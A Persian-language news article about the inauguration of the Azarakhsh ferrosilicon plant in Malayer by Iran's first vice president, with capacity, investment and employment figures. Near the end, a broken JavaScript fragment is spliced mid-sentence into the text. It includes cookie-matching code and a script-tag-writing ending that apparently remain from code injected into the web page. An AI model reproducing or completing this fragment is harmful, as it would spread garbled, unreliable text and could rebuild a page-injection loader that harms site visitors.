یکشنبه ۰۳ شهریور ۱۳۹۸ , ۱۷:۴۶:۰۴
2019 / August / 25خبربهمن ۱۶, ۱۳۹۷

شرکت فروسیلیس آذرخش با حضور جهانگیری بهره برداری شد

تولید سالانه 12هزار تن فروسیلیس

شرکت آهن و سیلیس آذرخش روز سه شنبه با حضور «اسحاق جهانگیری» معاون اول رییس جمهوری در شهرک صنعتی جوکار ملایر بهره برداری شد.

به گزارش پیام‌آوران معدن و فولاد، مدیرعامل شرکت آهن و سیلیس آذرخش در حاشیه بهره برداری شرکت فروسیلیس آذرخش گفت: این طرح بزرگ صنعتی سالانه قادر به تولید ۱۲ هزار تن فروسیلیس است.

محسن طوبایی میزان سرمایه گذاری برای اجرای این طرح را ۷۲۰ میلیارد ریال عنوان کرد و افزود: این طرح صنعتی زمینه اشتغال برای ۱۳۰ تن را مهیا کرده است.

طوبایی درباره آغاز عملیات اجرایی طرح توسعه این شرکت که به زودی آغاز می شود، گفت: در طرح توسعه این شرکت سرمایه گذاری حدود یک هزار و ۴۰۰ میلیارد ریال پیش بینی شده است.

مدیرعامل شرکت آهن و سیلیس آذرخش ظرفیت تولید این واحد صنعتی را ۲۰ هزار تن در سال و ارزش ماشین آلات آن را ۵۵۰ میلیارد ریال عنوان کرد .

طوبایی ادامه داد: این واحد در زمینی به مساحت ۲۲ هزار مترمربع احداث می شود و زمینه اشتغال برای ۱۳۰ تن را نیز ایجاد می کند.

به گزارش ایرنا، با حضور معاون اول رییس جمهوری به صورت همزمان عملیات اجرایی طرح توسعه شرکت فروسیلیس آذرخش آغاز شد.

«اسحاق جهانگیری» معاون اول رییس جمهوری که امروز سه شنبه برای بهره برداری و بازدید از چند طرح عمرانی و صنعتی به استان همدان سفر کرده است، با حضور در شهرستان ملایر ۲ طرح بزرگ صنعتی فروسیلیس را در شهرک صنعتی جوکار افتتاح کرد.

همچنین قرار است معاون اول رییس جمهوری از شهرک صنعتی مبل و منبت ملایر نیز بازدید کند.

سالانه بیش از ۳۶ هزار تن فروسیلیس در شهرک صنعتی جوکار ملایر تولید می شود. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.